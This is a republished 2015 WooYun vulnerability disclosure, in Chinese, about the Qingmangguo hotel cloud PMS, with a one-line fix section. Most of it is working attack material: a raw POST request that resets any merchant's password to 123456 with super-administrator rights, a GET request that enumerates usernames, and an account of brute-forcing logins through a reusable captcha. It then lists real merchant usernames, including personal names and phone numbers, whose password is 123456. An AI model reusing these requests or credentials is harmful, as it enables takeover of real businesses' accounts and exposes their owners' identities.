记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

青芒果酒店云PMS任意用户密码重置及1900个商家弱口令

2015-09-21 06:15

code 区域
http://pms.qmango.com/manage/login.jsp



注册个帐号,发现修改帐号权限的功能可以遍历所有商家的用户名,及修改商家的密码。

密码重置.png

密码重置1.png



code 区域
POST /manage/shezhi/yonghu_edit.jsp HTTP/1.1

Host: pms.qmango.com

Proxy-Connection: keep-alive

Content-Length: 412

Accept: */*

Origin: http://pms.qmango.com

X-Requested-With: XMLHttpRequest

User-Agent:

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://pms.qmango.com/manage/shezhi/yonghu_edit.jsp?id=9539&waibao_id=14&loupan_id=11648

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie:



id=2&action=editsave&waibao_id=14&loupan_id=11118&user_name=qmango1&name=qmango1&status=&password=123456&password1=123456&yuangong_id=0&login_err=0&zhekou=-1&jibie=超级管理员&flag=1001,1002,1003,1007,1005,1006,1008,2001,2002,2003,2004,2005,2006,2009,2007,2008,4006,2010,2011,3001,3002,3003,3004,4001,4007,1004,4002,4003,4004,4005,4008,4009,5001,5005,5006,5007,5008,5009,5010&logstarttime=2015-06-17 09:23:33



重置后可以正常登录,但是酒店通过这种 方法设置的密码酒店未能对应上,所以看不到帐号原酒店的订单信息。

但通过刚才的功能可以获取所有商家的用户名。

越权获取密码.png



code 区域
GET /manage/shezhi/yonghu_edit.jsp?id=2&waibao_id=14&loupan_id=2 HTTP/1.1

Host: pms.qmango.com



遍历loupan_id,共有一万多帐号

登录时验证码可以重复使用,于是进行破解

登录.png



有近2000个帐号的密码为123456

登录1.png

漏洞证明:

成功登录

帐号中心.png

订单截图.png



code 区域
部分密码为123456的用户

黑甜青年旅店

takeout><img

青岛天惠

admintao

fxhotels

banban540606

justtak><imge

22564518

q-huangqiaoling

新海岚轩客栈

58156590

霍艳丽

毕青春

renxiaomi

test0302

13811542722

bolunzhe

liuweixiong

18309909191

同创科技

buhaoji<img

yanghongju

chenglili

test-前台

沙景源1

dicsonpan

168inn1Z

13337571187

fysx8715570

jingduyipu

彭桂芳

80838595

凤凰家园

蜻蜓公寓

任小米

akang158

15890194185

zrgtdjd123

test-admin

xiaocheng

修复方案:

权限控制,验证码及时过期,防破解。


知识来源: www.wooyun.org/bugs/wooyun-2015-0121256

阅读:164522 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“青芒果酒店云PMS任意用户密码重置及1900个商家弱口令”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

ANNOUNCE

ADS

标签云

本页关键词